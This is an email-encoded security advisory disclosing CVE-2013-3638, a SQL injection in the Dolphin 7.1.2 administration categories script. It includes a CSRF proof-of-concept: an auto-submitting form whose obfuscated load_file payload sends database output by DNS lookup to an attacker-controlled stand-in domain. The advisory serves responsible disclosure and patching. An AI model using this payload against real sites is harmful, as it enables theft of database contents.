SQL Injection in Dolphin
Advisory ID: HTB23157
Product: Dolphin
Vendor: BoonEx
Vulnerable Version(s): 7.1.2 and probably prior
Tested Version: 7.1.2
Vendor Notification: May 22, 2013=20
Vendor Patch: May 29, 2013=20
Public Disclosure: June 12, 2013=20
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-3638
Risk Level: Medium=20
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w=
ww.htbridge.com/advisory/ )=20
---------------------------------------------------------------------------=
--------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerabili=
ty in Dolphin, which can be exploited to manipulate SQL requests passed to =
vulnerable application and obtain sensitive data from the database.
1) SQL Injection in Dolphin: CVE-2013-3638
The vulnerability exists due to insufficient validation of "pathes[]" HTTP =
POST parameter passed to "/administration/categories.php" PHP script. A rem=
ote authenticated administrator can execute arbitrary SQL commands in the a=
pplication's database.
This vulnerability could also be exploited by a remote non-authenticated at=
tacker via CSRF vector, since the application is prone to Cross-Site Reques=
t Forgery (CSRF) attacks. In order to do so an attacker should trick a logg=
ed-in application administrator to visit a web page with CSRF exploit.
The basic CSRF exploit code below is based on DNS Exfiltration technique an=
d may be used if the database of the vulnerable application is hosted on a =
Windows system. The exploit will send a DNS request demanding IP addess for=
`version()` (or any other sensetive output from the database) subdomain of=
".attacker.com" (a domain name, DNS server of which is controlled by the a=
ttacker):
<form action=3D"http://[host]/administration/categories.php" method=3D"post=
" name=3D"main">
<input type=3D"hidden" name=3D"pathes[]" value=3D"1%%(select load_file(CO=
NCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(=
116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR=
(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CH=
AR(114)))) -- %%1">
<input type=3D"hidden" name=3D"action_disable" value=3D"1">
<input type=3D"submit" id=3D"btn">
</form>
<script>
document.main.submit();
</script>
---------------------------------------------------------------------------=
--------------------
Solution:
Upgrade to Dolphin 7.1.3
More Information:
http://www.boonex.com/trac/dolphin/changeset/17659
http://www.boonex.com/trac/dolphin/milestone/Dolphin%207.1.3
http://www.boonex.com/n/stability-security-spam-prevention-and-more
---------------------------------------------------------------------------=
--------------------
References:
[1] High-Tech Bridge Advisory HTB23157 - https://www.htbridge.com/advisory/=
HTB23157 - SQL Injection in Dolphin.
[2] Dolphin - http://www.boonex.com - The world's most advanced software pl=
atform for building vibrant community websites.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in=
ternational in scope and free for public use, CVE=C2=AE is a dictionary of =
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to =
developers and security practitioners, CWE is a formal list of software wea=
kness types.=20
---------------------------------------------------------------------------=
--------------------
Disclaimer: The information provided in this Advisory is provided "as is" a=
nd without any warranty of any kind. Details of this Advisory may be update=
d in order to provide as accurate information as possible. The latest versi=
on of the Advisory is available on web page [1] in the References.
討論串 (同標題文章)